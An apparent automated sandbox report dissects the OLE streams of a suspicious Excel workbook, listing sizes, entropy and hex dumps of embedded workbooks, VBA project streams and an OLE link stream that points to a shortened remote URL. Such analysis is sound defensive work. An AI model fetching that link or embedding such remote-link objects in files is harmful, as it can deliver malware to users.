          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = True
          

          General
          Stream Path:\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.889430592781307
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:200
          Entropy:3.292068105701867
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . : ^ S O . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
          General
          Stream Path:MBD010681DB/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DB/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:37036
          Entropy:7.720975169587741
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.701136490257069
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
          General
          Stream Path:MBD010681DC/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:220
          Entropy:3.372234242231489
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD010681DC/MBD0018D4CE/\x1Ole
          CLSID:
          File Type:data
          Stream Size:20
          Entropy:0.5689955935892812
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . .
          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD0018D4CE/\x3ObjInfo
          CLSID:
          File Type:data
          Stream Size:4
          Entropy:0.8112781244591328
          Base64 Encoded:False
          Data ASCII:. . . .
          Data Raw:00 00 03 00
          General
          Stream Path:MBD010681DC/MBD0018D4CE/Contents
          CLSID:
          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
          Stream Size:197671
          Entropy:6.989042939766534
          Base64 Encoded:True
          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD0068D442/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD0068D442/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26243
          Entropy:7.635433729726103
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:248
          Entropy:3.0523231150355867
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:256
          Entropy:4.086306928392587
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:134792
          Entropy:7.974168320310173
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:468
          Entropy:5.269289820125323
          Base64 Encoded:True
          Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
          Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:83
          Entropy:3.0672749060249043
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:2486
          Entropy:3.9244127831265385
          Base64 Encoded:False
          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
          CLSID:
          File Type:data
          Stream Size:536
          Entropy:6.330646364694152
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
          Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
          General
          Stream Path:MBD010681DC/MBD00726B69/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD00726B69/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26242
          Entropy:7.635424485665502
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:283872
          Entropy:7.743278150467805
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
          General
          Stream Path:MBD010681DD/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DD/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:45934
          Entropy:7.5587990853484195
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DE/\x1Ole
          CLSID:
          File Type:data
          Stream Size:560
          Entropy:5.607558056244155
          Base64 Encoded:False
          Data ASCII:. . . . . 0 . . i V . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . V . v . B . B . U . A . l . 9 . T . i . ? . & . c . o . m . p . u . l . s . i . o . n . = . z . e . a . l . o . u . s . & . m . o . o . d . . . 2 . . . h 6 j . l . / . . . . . . . + k . . w ^ E . M Y % q . * 1 W . _ U . . a . ^ 8 U \\ . . h . n 8 . . . [ # . + o $ j = r u ] . . 2 u h . k . N 8 E W I J . . . W . 7 = > 1 . . [ & o % . . . . . . . . . . . . . .
          Data Raw:01 00 00 02 0d 95 30 02 d2 0c 69 56 00 00 00 00 00 00 00 00 00 00 00 00 16 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 12 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 56 00 76 00 42 00 42 00 55 00 41 00 6c 00 39 00 54 00 69 00 3f 00 26 00 63 00 6f 00 6d 00 70 00 75 00 6c 00 73 00 69 00
          General
          Stream Path:Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:316629
          Entropy:7.998637073721496
          Base64 Encoded:True
